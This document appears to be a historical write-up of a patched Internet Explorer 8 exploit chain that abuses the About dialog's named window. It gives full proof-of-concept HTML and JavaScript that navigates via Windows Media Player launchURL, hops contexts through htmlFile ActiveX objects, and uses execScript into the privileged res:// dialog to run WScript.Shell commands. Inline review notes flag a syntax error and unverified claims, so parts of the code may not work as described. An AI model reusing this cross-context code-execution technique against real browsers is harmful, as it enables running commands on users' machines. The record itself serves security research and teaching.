This is the IE8 variation of the _unspecifiedFrame About dialog attack. The IE7 version used a direct window.open to hijack the frame; IE8 blocked that approach, so this variant instead uses Windows Media Player’s launchURL, which could still navigate a named window. Once inside, a cross-origin technique (WOOBR #969594) using an htmlFile ActiveX object and setTimeout provides access back to the About dialog’s elevated context.
<!-- index.html: uses WMP launchURL instead of window.open to bypass IE8's restriction -->
<object id="oWMP" classid="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6" width="1" height="1"></object>
<script language="JavaScript">
function WMP_launchURL(url, windowName)
{
  // WMP receives one string, "<url>&&<windowName>"; the page relies on launchURL
  // navigating the named window, which IE8 no longer allowed via window.open.
  var player = document.all.oWMP;
  var launchArg = url + '&&' + windowName;
  player.launchURL(launchArg);
}
// Latch so the polled changeUnspecifiedFrameLocation() triggers the WMP navigation only once.
var alreadyLoaded = false;
// Polled every 3 s from the htmlFile window (see interval_Wait_for_Window below) until the
// named window "_unspecifiedFrame" can be pushed to bridge_to_exploit.html via WMP.
// Two paths lead to the navigation: window.open("", "_unspecifiedFrame") throwing, or a handle
// already being held in win_unspecifiedFrame. In both paths the latch is set and the interval
// cleared before WMP_launchURL is called.
// NOTE(review): the throw is presumably taken as "the named window exists but IE8 denies this
// page a handle to it" — that interpretation is not established by the code here.
// NOTE(review): clearInterval here resolves against this page's window, while the timer was
// created on newTridentThread.parentWindow; whether IE8 clears a timer across those windows is
// not shown here, so alreadyLoaded is the guard that actually prevents repeat firing.
function changeUnspecifiedFrameLocation()
{
if (alreadyLoaded) return;
if (!win_unspecifiedFrame)
{
try {
// Empty URL: attempts to obtain a handle to the existing named window rather than load anything.
win_unspecifiedFrame = window.open("","_unspecifiedFrame")
}
catch(e)
{
alreadyLoaded = true;
clearInterval(interval_Wait_for_Window);
// Named-window navigation into a window created by the res:// About dialog is the boundary
// crossing; the vendor fix (per the notes at the bottom) removed the named window from that link.
WMP_launchURL(currentDir + 'bridge_to_exploit.html', '_unspecifiedFrame');
}
}
else
{
alreadyLoaded = true;
clearInterval(interval_Wait_for_Window);
WMP_launchURL(currentDir + 'bridge_to_exploit.html', '_unspecifiedFrame');
}
}
// Directory of this page (everything up to and including the last '/'), used to address
// bridge_to_exploit.html relative to it.
var currentDir = location.href.substring(0,location.href.lastIndexOf('/')+1);
// Handle to the named window; only populated if window.open succeeds inside the poll above.
var win_unspecifiedFrame = null;
// Separate document created through the htmlFile ActiveX object; its parentWindow carries its
// own script engine, which is where the poll is scheduled (the "new trident thread" of the name).
var newTridentThread = new ActiveXObject('htmlFile');
// String-form setInterval: the string is evaluated in the htmlFile window, so the callback must
// exist there by name — the export on the next line provides it.
var interval_Wait_for_Window = newTridentThread.parentWindow.setInterval('changeUnspecifiedFrameLocation()',3000);
// Exported after scheduling; ordering is harmless because the first tick is 3 s away.
// NOTE(review): this is a cross-document script-engine hop; if the timer id is not shared between
// the two windows, the clearInterval inside the callback may not stop this interval (see note there).
newTridentThread.parentWindow.changeUnspecifiedFrameLocation = changeUnspecifiedFrameLocation;
</script>
<!-- bridge_to_exploit.html: uses htmlFile + setTimeout to re-load the About dialog URL in our context -->
<script language="JavaScript">
// Implicit global (no var). A fresh htmlFile document whose Script object is a distinct window
// context from this page.
myAx = new ActiveXObject('htmlFile');
// String-form setTimeout evaluated in the htmlFile window: names that window "ALFAJOR", then
// opens the XP About dialog resource into the same name. The page comment above describes this
// as re-loading the About dialog URL in this page's context; the code itself does not show why
// that yields a usable context — verify against IE8 before relying on the description.
myAx.Script.setTimeout('window.name="ALFAJOR";window.open("res://ieframe.dll/aboutXP.dlg","ALFAJOR")');
// Runs 2 s after load (setTimeout below). Publishes this page's opener — the window that
// navigated here, which per the author's notes is the About dialog — into the htmlFile window
// as `win`, then has that window call execScript on it, so the inline script runs with the
// opener's (res://) privileges. This execScript-into-opener step is the elevation the fix removed;
// from a detection standpoint, WScript.Shell being instantiated from a browser-hosted script
// engine is the observable artifact.
function injectCodeInDLG()
{
myAx.Script.win = opener;
// NOTE(review): inside the string, `try{...};catch(e){}` is a syntax error in standard ECMAScript
// (a `try` block must be followed directly by catch/finally). The notes below report both programs
// launching on XP, so JScript presumably tolerated it — but do not read the try/catch as guarding anything.
myAx.Script.setTimeout('win.execScript(\'var Shell = new ActiveXObject("WScript.Shell");Shell.Run("notepad");try{Shell.Run("calc");};catch(e){}\')');
}
// 2 s delay before injecting; presumably to let the window/opener relationship settle after the
// htmlFile timeout above fires — the code does not establish the required ordering.
setTimeout('injectCodeInDLG()',2000);
</script>
The About dialog still requires a user click on the copyright link. On Vista Protected Mode only Notepad opens; on XP both Notepad and Calculator launch. The fix was the same as IE7: remove the named window from the About dialog’s link navigation.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.